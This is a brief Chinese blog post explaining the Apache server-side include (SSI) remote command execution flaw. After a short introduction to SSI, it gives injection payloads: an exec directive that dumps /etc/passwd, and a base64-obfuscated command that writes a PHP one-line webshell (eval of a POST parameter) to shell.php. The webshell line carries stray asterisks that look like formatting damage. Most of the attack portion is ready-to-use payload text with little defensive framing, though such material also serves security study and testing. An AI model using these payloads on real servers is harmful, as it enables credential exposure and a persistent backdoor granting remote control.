Apache SSI 远程命令执行漏洞
ssi简介
SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。
例如,您可以将指令放置到现有的HTML页面中,例如:
<!--#echo var="DATE_LOCAL" -->
并且,当该页面被投放时,该片段将被评估并替换为其值:
Tuesday, 15-Jan-2013 19:28:54 EST
读取etc/password
<!--#exec cmd="cat /etc/passwd" -->
也可以写入一句话木马
<!--*#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->*
标签:漏洞,HTML,SSI,Apache,远程,页面 From: https://www.cnblogs.com/GTL-JU/p/16831566.html